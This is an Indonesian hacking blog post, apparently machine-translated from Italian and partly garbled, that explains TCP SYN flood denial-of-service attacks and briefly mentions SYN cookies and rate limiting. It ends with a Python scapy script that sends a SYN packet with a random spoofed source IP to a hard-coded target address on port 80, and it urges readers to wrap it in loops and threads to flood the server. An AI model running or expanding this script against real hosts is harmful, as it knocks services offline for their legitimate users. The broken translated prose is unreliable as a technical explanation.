The DDOS Specialist


Serangan dilakukan oleh penyerang yang mengirimkan beberapa paket, tetapi sinyal tidak kembali "ACK" server.
Koneksi ditetapkan sehingga hanya sebagian dan menggunakan sumber daya server.
Para pengguna yang ingin sah terhubung ke server, karena server gagal menolak untuk membuka koneksi baru, sehingga mencapai serangan penolakan layanan.
Serangan banjir SYN penolakan layanan di mana penyerang mengirimkan serangkaian permintaan SYN ke sistem diserang.
Ketika klien mencoba untuk melakukan koneksi TCP ke server, klien dan pertukaran server serangkaian pesan yang biasanya adalah sebagai berikut:
1. Klien meminta koneksi dengan mengirimkan pesan SYN (menyinkronkan) server.
2. Server Il mengakui, yang merespon permintaan ini dengan mengirimkan kembali SYN-ACK ke klien, akhirnya,
3. Merespon dengan ACK dan sambungan dibuat.
Proses ini disebut TCP jabat tangan tiga arah dan yayasan didirikan untuk setiap koneksi menggunakan TCP / IP.
Ini adalah serangan terkenal, yang umumnya tidak efektif terhadap jaringan modern. Ia bekerja jika server mengalokasikan sumber daya setelah menerima SYN, tetapi sebelum menerima ACK.
Anda dapat menggunakan dua metode untuk menyerang. Seorang klien berbahaya mungkin gagal untuk mengirim ACK terakhir. Atau menggunakan alamat sumber IP palsu dalam pesan SYN, server akan mengirimkan pesan ke alamat IP palsu pesan SYN-ACK dan ACK diterima sebagai hasilnya. Dalam kedua kasus server akan menunggu untuk pesan yang diterima untuk sementara waktu, karena kemacetan jaringan normal bisa menjadi penyebab dari ACK yang hilang.

Jika koneksi ini didirikan hanya sebagian mengalokasikan sumber daya pada server, mungkin untuk sepenuhnya melahap sumber daya ini dengan mengirimkan sejumlah besar pesan SYN, un banjir appunto, ke server. Setelah sumber daya untuk koneksi seperti "setengah terbuka" telah sepenuhnya dialokasikan, tidak ada sambungan baru (apakah itu sah atau tidak) tidak mungkin lagi, sehingga mencapai serangan penolakan layanan. Beberapa sistem mungkin memiliki kerusakan berat atau bahkan crash jika fungsi sistem operasi tidak diawetkan dengan jenis masalah.

Di antara penanggulangan ada SYN cookies atau membatasi jumlah koneksi baru dari satu sumber per satuan waktu.
Dalam IP, singkatnya sumber palsu kepada klien dengan ip "off" dan mengirimkan paket SYN untuk meminta sambungan, risposnde server dengan SYN-ACK dan menunggu untuk menerima pcchetto ack dengan nomor seq dikirim olehnya hanya bahwa ip palsu tidak aktif .. jadi dia tidak mengirim balasan untuk memutuskan .. dalam hal ini untuk N detik .. Server akan. Mengambil sumber daya untuk menghubungkan ditetapkan sebelumnya ... [akses ip jika akan mengirim RST ** server dan karena itu membebaskan sumber daya] dan yang mana server kacau jika Anda tidak memiliki penanggulangan aktif seperti firewall atau lainnya ...
Mari kita lihat bagaimana untuk mereproduksi ini menggunakan python serangan scapy ;)
from scapy.all import *
import random
conf.iface='wlan0';#network card XD
target="94.141.22.29";
port=80;
packetIP = IP();
packetIP.src = "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254));#sppofed ip :D
packetIP.dst = target;
packetTCP = TCP();
packetTCP.sport = RandShort();
packetTCP.dport = port;
packetTCP.flags = 'S';
packet=packetIP/packetTCP;
send(packet, verbose=0);
Tentu saja kode diatas mengirimkan satu pcchetto ;) add kami sementara Anda benang dll: D

Ditulis Oleh : ADMIN ~ Manok Siam

Muh.Akram Anda sedang membaca artikel berjudul The DDOS Specialist yang ditulis oleh Reja Exe Cyber yang berisi tentang : Dan Maaf, Anda tidak diperbolehkan mengcopy paste artikel ini.

Jika Anda menyukai Artikel di blog ini, Silahkan berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Reja Exe Cyber

0 comments:

Post a Comment

Powered by Blogger.
Back to top